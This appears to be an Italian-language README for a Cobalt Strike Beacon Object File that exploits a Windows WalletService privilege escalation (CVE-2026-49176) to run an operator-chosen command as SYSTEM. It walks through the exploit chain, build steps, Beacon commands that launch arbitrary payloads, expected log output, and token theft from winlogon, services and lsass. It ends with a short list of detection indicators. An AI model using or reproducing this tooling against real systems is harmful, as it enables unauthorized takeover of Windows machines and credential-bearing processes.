
CVE-2026-49176 WalletService LPE — PoC standalone + Cobalt Strike BOF (comando SYSTEM su sessione interattiva)
BOF (Beacon Object File) per Cobalt Strike per l'escalation dei privilegi locale tramite Windows WalletService (CVE-2026-49176, corretto a luglio 2026).
Da un Beacon a integrità media (utente standard), questo strumento prepara un database ESE Wallet dannoso, reindirizza Documents, attiva WalletService ed esegue una riga di comando specificata dal chiamante come NT AUTHORITY\SYSTEM sul desktop interattivo.
Solo BOF.
PoC PowerShell autonomo originale: DavidCarliez/CVE-2026-49176_LPE_POC. Stessa causa principale della vulnerabilità; diversa distribuzione e avvio del processo post-SYSTEM.
Solo per ricerca sulla sicurezza autorizzata, istruzione e validazione difensiva.
WalletService risolve FOLDERID_Documents mentre impersona il chiamante, quindi torna a LocalSystem prima di aprire:
<Documents>\Wallet\wallet.db
Un utente standard può popolare quel database con un callback ESE predefinito definito dall'utente (PATH\payload.dll!Export), puntare Documents a una directory controllata e chiamare WinRT WalletManager.RequestStoreAsync / GetItemsAsync così che il servizio carichi la DLL come SYSTEM.
Analisi tecnica: CVE-2026-49176 Exploit Development: WalletService to SYSTEM
Standard user
→ seed Wallet\wallet.db with ESE persisted callback (DLL!WalletCallback)
→ SHSetKnownFolderPath(FOLDERID_Documents) → staging root
→ trigger WalletService (WinRT RequestStore / GetItems)
→ service opens DB as LocalSystem → LoadLibrary(callback DLL)
→ attacker code runs as SYSTEM ← LPE complete
| Fase | PoC originale | Questo BOF |
|---|---|---|
| Seed ESE DB | wallet_ese_seed.exe | In-BOF Jet*A |
| Reindirizzamento Documents | documents_path.exe | In-BOF SHGet/SetKnownFolderPath |
| Trigger Wallet | PowerShell WinRT | In-BOF RoGetActivationFactory |
| DLL di callback | wallet_callback_shell.dll | wallet_callback.dll |
WalletService usa spesso un token SYSTEM filtrato (senza SeAssignPrimaryToken / SeImpersonate utilizzabili). Un CreateProcess* diretto → 1314.
| PoC originale | Questo BOF | |
|---|---|---|
| Processo obiettivo | cmd.exe hard-coded | Riga di comando fornita dall'operatore |
| Metodo principale | Servizio temporaneo → shell_broker.exe → CreateProcessAsUserW | Furto del token da winlogon / services / lsass → spawn |
| Fallback | Nessuno | SCM + cmd.exe /c "shell_broker.exe" "result.txt" |
Original PoC (post-SYSTEM):
DLL → CreateService(shell_broker.exe) → broker → fixed cmd.exe
This BOF (post-SYSTEM):
DLL → steal winlogon/services/lsass token → spawn <command>
→ else CreateService(cmd /c broker) → broker → spawn <command>
wallet_callback.dll + shell_broker.exe tramite bof_pack("bbZ")result.txt| Elemento | Requisito |
|---|---|
| Beacon | x64, integrità media (non elevata) |
| Target | WalletService vulnerabile (patch pre-luglio 2026) |
| CS | Cobalt Strike 4.x con supporto BOF |
| Build | VS 2019/2022 C++ + Windows 10 SDK (esent.h, WinRT) |
bof/
├── README.md
├── entry.cpp # BOF orchestrator (go)
├── bofdefs.h / beacon.h
├── beacon-debug.h
├── cve2026_49176.cna
├── build.bat
├── payload/
│ ├── wallet_callback.c
│ └── shell_broker.c
├── bin/
│ ├── BOF/cve2026_49176.x64.o
│ └── payload/
│ ├── wallet_callback.dll
│ └── shell_broker.exe
└── resources/strip_bof.ps1
cd bof
build.bat
| Comando | Output |
|---|---|
build.bat / build.bat both | DLL + broker + x64 BOF |
build.bat payload | Solo DLL + broker |
build.bat clean | Rimuove gli artefatti |
bin\payload\wallet_callback.dll
bin\payload\shell_broker.exe
bin\BOF\cve2026_49176.x64.o
Modificare i percorsi VCVARS64 in build.bat se VS non è in posizione predefinita.
Flag critici: /DBOF /GS- /GR- /Gs999999 /GF- /Gy- /Gw- /Od (sicurezza del linker CS BOF).
Cobalt Strike → Scripts → Load → cve2026_49176.cna
(Ricaricare dopo ogni ricompilazione.)
beacon> cve2026_49176 C:\Windows\System32\cmd.exe
beacon> cve2026_49176 C:\Windows\Temp\payload.exe
beacon> cve2026_49176 C:\Windows\System32\cmd.exe /c whoami > C:\Users\Public\whoami.txt
%LOCALAPPDATA%\CVE-2026-49176-BOF\CVE49176_<tick>_<pid>\
├── Wallet\wallet.db
└── payload\
├── wallet_callback.dll
├── shell_broker.exe
├── command.txt # UTF-16 LE
└── result.txt
bof_pack(bid, "bbZ", wallet_callback.dll, shell_broker.exe, command)
[*] CVE-2026-49176 SYSTEM exec: C:\Windows\System32\cmd.exe [dll=... broker=... bof=...]
[*] CVE-2026-49176 BOF enter (args=...)
[*] parsed dll_len=... broker_len=... cmd_bytes=...
[*] stage payload...
[+] Seeded wallet.db, column=256
[*] Documents redirected to: ...
[+] WalletService triggered
[*] wait payload result (20s)...
[+] event=SYSTEM_PROCESS_STARTED ... user=SYSTEM detail=winlogon
[+] SYSTEM process launched
[*] Documents restored: ...
[+] CVE-2026-49176 BOF complete
detail= può essere winlogon, services, lsass o un percorso del broker.
| Log | Significato |
|---|---|
JetAddColumn: -1003 | Problema di parametri ESE |
error=1314 | SYSTEM filtrato; necessario furto del token / broker |
STEAL_FAIL error=5 | Impossibile aprire il processo/token di destinazione |
StartService error=32 | Violazione di condivisione (mitigata tramite wrapper cmd) |
detail=all_methods | Tutte le strategie post-SYSTEM sono fallite |
Linker Unknown symbol '??_C@_...' | Flag di build BOF errati; ricompilare con build.bat |
Documents viene ripristinato anche in caso di errore quando il reindirizzamento è riuscito.
cve2026_49176.cna
└─ inline-execute(entry.o, go, bbZ)
entry.cpp
├─ stage files under %LOCALAPPDATA%
├─ Jet*A seed wallet.db
├─ SHSetKnownFolderPath(Documents)
├─ WinRT WalletManager trigger
└─ wait result.txt + restore Documents
wallet_callback.dll (WalletService, SYSTEM)
├─ steal winlogon / services / lsass token → spawn command
└─ fallback: CreateService(cmd /c shell_broker)
shell_broker.exe
└─ command.txt → CreateProcessAsUser (interactive session)
%LOCALAPPDATA%\CVE-2026-49176-BOF\* + wallet.db + DLL di callbackOpenProcess / token verso winlogon/lsass/servicesCVE49176_*CreateProcessAsUserW / CreateProcessWithTokenW in sessioni interattive